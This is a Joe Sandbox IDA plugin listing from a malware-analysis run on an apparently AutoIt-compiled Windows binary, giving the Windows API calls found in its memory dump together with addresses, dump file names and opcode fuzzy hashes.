                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                        • String ID: SysAnimate32
                                        • API String ID: 3529120543-1011021900
                                        • Opcode ID: 79d344b8dbf07bc7577c897dbd80bdc2d0535191d6cb7ccb587e417e35c464e0
                                        • Instruction ID: 4637bcc4d9f9e0f84196d9b095fccbe0789c67cae69d46958c1786fddd724b55
                                        • Opcode Fuzzy Hash: 79d344b8dbf07bc7577c897dbd80bdc2d0535191d6cb7ccb587e417e35c464e0
                                        • Instruction Fuzzy Hash: 66219A71204229BBEB106FA4DC88FBB37B9EF59368F110228FA60D2190D771DC51D768
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C14D1E,00C228E9,?,00C14CBE,00C228E9,00CB88B8,0000000C,00C14E15,00C228E9,00000002), ref: 00C14D8D
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C14DA0
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00C14D1E,00C228E9,?,00C14CBE,00C228E9,00CB88B8,0000000C,00C14E15,00C228E9,00000002,00000000), ref: 00C14DC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 4a1e0975a038227cf98bc39f6bef955adc7fbad5d287ac2e26a35d48179df594
                                        • Instruction ID: 699e0c864405d54c557e5dd76fe9b659dfb6cd8923999bba2da7b6f09130798b
                                        • Opcode Fuzzy Hash: 4a1e0975a038227cf98bc39f6bef955adc7fbad5d287ac2e26a35d48179df594
                                        • Instruction Fuzzy Hash: 3CF04435540208BBDF159F90EC89BDDBBB5EF45752F100164F905A2160CB705A94DB95
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF4EDD,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E9C
                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BF4EAE
                                        • FreeLibrary.KERNEL32(00000000,?,?,00BF4EDD,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4EC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-3689287502
                                        • Opcode ID: ea9438a270d0f0f7b470fea1bd82f66c486c7b2f8010e28eb52ac22f394ed94c
                                        • Instruction ID: 126909c2165adbd42eb13e27b16ca5510cace7b55b641b31b40b887a3a6cabad
                                        • Opcode Fuzzy Hash: ea9438a270d0f0f7b470fea1bd82f66c486c7b2f8010e28eb52ac22f394ed94c
                                        • Instruction Fuzzy Hash: 2AE0CD36A015225BD3321B257C9CB7F7594EF81F62B050165FE00D3200DB70CD0982B4
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C33CDE,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E62
                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BF4E74
                                        • FreeLibrary.KERNEL32(00000000,?,?,00C33CDE,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-1355242751
                                        • Opcode ID: c55dabae7e122cbadb5eee54dd76287f6c560ad5bad01ad7637a2a1166338c8f
                                        • Instruction ID: c3fe647c7b3af3b695b7bcf8e55327e96190e2d671add8d085425de4cb120c51
                                        • Opcode Fuzzy Hash: c55dabae7e122cbadb5eee54dd76287f6c560ad5bad01ad7637a2a1166338c8f
                                        • Instruction Fuzzy Hash: B8D0C232502A215747321B247C8CFAF2A58EF81F113050260BA00A3110CF30CD0A83F8
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 00C7A427
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C7A435
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C7A468
                                        • CloseHandle.KERNEL32(?), ref: 00C7A63D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                        • String ID:
                                        • API String ID: 3488606520-0
                                        • Opcode ID: b44eb1059cd1f5622548c791dd634ced4f1c42488d2f16c4890978b54ca26c27
                                        • Instruction ID: 4556762a69a637d8815d9ce6189f55881cab6aa71074f47a6e1d0925127ed8ba
                                        • Opcode Fuzzy Hash: b44eb1059cd1f5622548c791dd634ced4f1c42488d2f16c4890978b54ca26c27
                                        • Instruction Fuzzy Hash: 07A1A0716043019FD720DF24C886F2AB7E5AF84714F14885DFA6A9B2D2D7B0ED45CB92
                                        APIs
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C93700), ref: 00C2BB91
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C2BC09
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC1270,000000FF,?,0000003F,00000000,?), ref: 00C2BC36
                                        • _free.LIBCMT ref: 00C2BB7F
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C2BD4B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                        • String ID:
                                        • API String ID: 1286116820-0
                                        • Opcode ID: ab083b5963c14063d61cba436eb60502a62f0c16a4f07b27738f5ffb3a9d62ed
                                        • Instruction ID: 932b9603af140bc6034646f4a95da9ea5a26b5399296dc82079d95d2f6bd1560
                                        • Opcode Fuzzy Hash: ab083b5963c14063d61cba436eb60502a62f0c16a4f07b27738f5ffb3a9d62ed
                                        • Instruction Fuzzy Hash: 97511A71900229AFCB10EF65EC81FAEB7BCEF45320F14426AE424D75A2EB709E419B50
                                        APIs
                                          • Part of subcall function 00C5DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C5CF22,?), ref: 00C5DDFD
                                          • Part of subcall function 00C5DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C5CF22,?), ref: 00C5DE16
                                          • Part of subcall function 00C5E199: GetFileAttributesW.KERNEL32(?,00C5CF95), ref: 00C5E19A
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00C5E473
                                        • MoveFileW.KERNEL32(?,?), ref: 00C5E4AC
                                        • _wcslen.LIBCMT ref: 00C5E5EB
                                        • _wcslen.LIBCMT ref: 00C5E603
                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C5E650
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                        • String ID:
                                        • API String ID: 3183298772-0
                                        • Opcode ID: b800243653ec2198748931ce3f1a9c5f39d76c9e6b0e708e33b2f5a97fe771cb
                                        • Instruction ID: e21ce323d698410262029c63d3ff5c0574e2bc844f08c2449f9e17448af27d55
                                        • Opcode Fuzzy Hash: b800243653ec2198748931ce3f1a9c5f39d76c9e6b0e708e33b2f5a97fe771cb
                                        • Instruction Fuzzy Hash: 2B5140B24083459BC728EB90D881ADF73ECAF85341F40491EFA9993151EF74A7CC976A
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C7C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7B6AE,?,?), ref: 00C7C9B5
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7C9F1
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA68
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7BAA5
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7BB00
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C7BB63
                                        • RegCloseKey.ADVAPI32(?,?), ref: 00C7BBA6
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C7BBB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 826366716-0
                                        • Opcode ID: 09dbbb9b22b58205c941de61a65d9beb5e20dd9c6f750425a83aa272c2e041d2
                                        • Instruction ID: f1b5c95ee4f2d9df91b22c4f6ef442b638bd84845bf5705872d5857039cf7644
                                        • Opcode Fuzzy Hash: 09dbbb9b22b58205c941de61a65d9beb5e20dd9c6f750425a83aa272c2e041d2
                                        • Instruction Fuzzy Hash: 40618E31208245AFD314DF14C491F2ABBE5FF84358F1485ADF5998B2A2DB31ED49CB92
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00C58BCD
                                        • VariantClear.OLEAUT32 ref: 00C58C3E
                                        • VariantClear.OLEAUT32 ref: 00C58C9D
                                        • VariantClear.OLEAUT32(?), ref: 00C58D10
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C58D3B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C68BAE
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C68BDA
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C68C32
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C68C57
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C68C5F
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String
                                        APIs
                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C78F40
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00C78FD0
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C78FEC
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00C79032
                                        • FreeLibrary.KERNEL32(00000000), ref: 00C79052
                                          • Part of subcall function 00C0F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C61043,?,7529E610), ref: 00C0F6E6
                                          • Part of subcall function 00C0F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C4FA64,00000000,00000000,?,?,00C61043,?,7529E610,?,00C4FA64), ref: 00C0F70D
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                        APIs
                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00C86C33
                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00C86C4A
                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C86C73
                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C6AB79,00000000,00000000), ref: 00C86C98
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00C86CC7
                                        Similarity
                                        • API ID: Window$Long$MessageSendShow
                                        APIs
                                        Similarity
                                        • API ID: _free
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00C09141
                                        • ScreenToClient.USER32(00000000,?), ref: 00C0915E
                                        • GetAsyncKeyState.USER32(00000001), ref: 00C09183
                                        • GetAsyncKeyState.USER32(00000002), ref: 00C0919D
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        APIs
                                        • GetInputState.USER32 ref: 00C638CB
                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C63922
                                        • TranslateMessage.USER32(?), ref: 00C6394B
                                        • DispatchMessageW.USER32(?), ref: 00C63955
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C63966
                                        Similarity
                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00C6CF38
                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00C6CF6F
                                        • GetLastError.KERNEL32(?,00000000,?,?,?,00C6C21E,00000000), ref: 00C6CFB4
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C6C21E,00000000), ref: 00C6CFC8
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C6C21E,00000000), ref: 00C6CFF2
                                        Similarity
                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00C51915
                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C519C1
                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 00C519C9
                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C519DA
                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C519E2
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        APIs
                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C85745
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C8579D
                                        • _wcslen.LIBCMT ref: 00C857AF
                                        • _wcslen.LIBCMT ref: 00C857BA
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C85816
                                        Similarity
                                        • API ID: MessageSend$_wcslen
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 00C70951
                                        • GetForegroundWindow.USER32 ref: 00C70968
                                        • GetDC.USER32(00000000), ref: 00C709A4
                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00C709B0
                                        • ReleaseDC.USER32(00000000,00000003), ref: 00C709E8
                                        Similarity
                                        • API ID: Window$ForegroundPixelRelease
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 00C2CDC6
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C2CDE9
                                          • Part of subcall function 00C23820: RtlAllocateHeap.NTDLL(00000000,?,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6,?,00BF1129), ref: 00C23852
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C2CE0F
                                        • _free.LIBCMT ref: 00C2CE22
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C2CE31
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C09693
                                        • SelectObject.GDI32(?,00000000), ref: 00C096A2
                                        • BeginPath.GDI32(?), ref: 00C096B9
                                        • SelectObject.GDI32(?,00000000), ref: 00C096E2
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        APIs
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: f3194cfea4b743fdc9102d15322960e276cbe9070588bbb72ef0a05c01eb24ab
                                        • Instruction ID: a86c1bb83a34ec265d3a827408d4ce51c089c7575823050d82b35cab870c2c28
                                        • Opcode Fuzzy Hash: f3194cfea4b743fdc9102d15322960e276cbe9070588bbb72ef0a05c01eb24ab
                                        • Instruction Fuzzy Hash: 6001F5A9251609BBD21861129D92FFB735C9B263DAF540034FE149A241F720EED593A8
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,00C1F2DE,00C23863,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6), ref: 00C22DFD
                                        • _free.LIBCMT ref: 00C22E32
                                        • _free.LIBCMT ref: 00C22E59
                                        • SetLastError.KERNEL32(00000000,00BF1129), ref: 00C22E66
                                        • SetLastError.KERNEL32(00000000,00BF1129), ref: 00C22E6F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 658182399932a983d0eb1fc33b493929609b0c81347f35a77db38c6f71990b52
                                        • Instruction ID: c75a65920f8786e43a02c42d9f29e9b5eadc214c0e8f3c5483bddb62a59be5e2
                                        • Opcode Fuzzy Hash: 658182399932a983d0eb1fc33b493929609b0c81347f35a77db38c6f71990b52
                                        • Instruction Fuzzy Hash: 8F01F43224562077C61237397C86F7F265DABD53A2B220128F431A2AE3EF74CD017120
                                        APIs
                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?,?,00C5035E), ref: 00C5002B
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?), ref: 00C50046
                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?), ref: 00C50054
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?), ref: 00C50064
                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?), ref: 00C50070
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: 3e7daa301dbbf84e1841d3e8ee606ed667ae7a7e1367f7355d94e371d4206c50
                                        • Instruction ID: 467b19ce65cf86c0c4596c40193fe63e83562521f7bb46600ba8f5ad9f5db072
                                        • Opcode Fuzzy Hash: 3e7daa301dbbf84e1841d3e8ee606ed667ae7a7e1367f7355d94e371d4206c50
                                        • Instruction Fuzzy Hash: 68018B7A600204BFDB104F69DC88BAE7BADEB84793F244124FD05D2290E775DE848BA4
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00C5E997
                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 00C5E9A5
                                        • Sleep.KERNEL32(00000000), ref: 00C5E9AD
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00C5E9B7
                                        • Sleep.KERNEL32 ref: 00C5E9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: 75ca0a377b9254e746be836ae7ca51267e3655c856a3ba93fdb974db97774e6f
                                        • Instruction ID: 02c7e35cbc9626569363e4505e7ba18eaf40a3687c8a3f53efb7254894fb7cf1
                                        • Opcode Fuzzy Hash: 75ca0a377b9254e746be836ae7ca51267e3655c856a3ba93fdb974db97774e6f
                                        • Instruction Fuzzy Hash: 3C015B35C01529DBCF04ABE5D8897DDBB78FB09302F000546E912B2150DB309699C769
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51114
                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51120
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C5112F
                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51136
                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C5114D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 842720411-0
